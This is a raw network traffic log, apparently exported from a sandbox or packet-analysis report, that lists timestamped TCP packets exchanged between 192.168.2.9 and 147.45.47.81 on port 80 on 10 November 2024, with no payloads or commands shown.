                                                                                                                                                                                Nov 10, 2024 09:18:24.929847002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929858923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929868937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929897070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.933887005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.933931112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.933943033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.933979034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.976929903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.976947069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.976959944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.976983070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.977015972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.977022886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.977035999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.977046967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.977082014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.044476986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044497967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044514894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044528008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044540882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044606924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.044651985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044701099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.044707060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044718027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.044756889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045006990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045064926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045075893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045119047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045268059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045314074 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045319080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045331955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045346975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045373917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045742035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045788050 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045790911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045917034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045928955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045941114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.045967102 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.045986891 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.049647093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.049715042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.049726963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.049762964 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.093076944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.093116999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.093131065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.093223095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.135495901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.135509968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.135521889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.135562897 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.135617018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.160471916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160537958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160595894 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.160660028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160672903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160679102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160690069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160702944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160723925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160738945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160744905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160751104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.160752058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.160752058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.160811901 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.161145926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161184072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161195993 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.161196947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161237955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.161350012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161407948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161422968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161448956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.161475897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161489964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.161515951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.165909052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.165941000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.165951967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.165965080 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.166011095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.209290028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.209306955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.209352016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.209352016 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.251130104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.251151085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.251164913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.251202106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.251226902 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.275994062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276019096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276030064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276041985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276071072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276104927 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276319981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276341915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276354074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276380062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276453972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276495934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276555061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276566029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276592016 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276659012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276726961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276743889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276773930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276892900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276917934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276930094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.276932955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.276969910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.277147055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277189970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277201891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277266026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.277282953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277296066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277327061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.277667999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277698994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.277704000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277717113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.277756929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.281542063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.281554937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.281567097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.281589985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.324091911 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.325278997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.325334072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.325347900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.325376034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.366730928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.366744041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.366755962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.366769075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.366836071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.391609907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391679049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391727924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.391926050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391940117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391952991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391964912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.391977072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.391994953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392092943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392133951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392159939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392235041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392246962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392258883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392275095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392293930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392438889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392457008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392508984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392631054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392642021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392683983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.392699003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392720938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.392759085 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.393121958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393311977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393323898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393358946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.393666983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393680096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393692970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393709898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393728018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.393769979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.393848896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393862963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393876076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.393887997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.393927097 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.397787094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.397800922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.397861004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.441046953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.441060066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.441071033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.441152096 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.482314110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.482332945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.482343912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.482391119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.507900953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.507947922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.507961035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.507972956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.507987022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.507996082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508002043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508023024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508037090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508037090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508069992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508078098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508086920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508111954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508364916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508378029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508390903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508420944 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508449078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508519888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508533001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508538961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508570910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508734941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508780003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508814096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508826971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508862019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.508900881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508913994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508927107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.508956909 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.509011984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.509057045 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.509145975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.509212971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.509253025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.555284023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.555295944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.555305958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.555331945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.555354118 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.555401087 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.556462049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.556474924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.556485891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.556533098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.597975016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.597997904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.598011017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.598040104 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.598074913 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623239994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623260021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623270035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623321056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623332977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623344898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623347044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623378992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623394012 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623712063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623722076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623733044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623753071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623758078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623775959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623788118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623792887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623799086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623811960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.623820066 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.623851061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624155045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624231100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624243021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624268055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624274015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624285936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624296904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624310017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624346018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624514103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624524117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624563932 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624619007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624631882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624644041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624656916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.624663115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.624701023 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.670959949 CET8049833147.45.47.81192.168.2.9
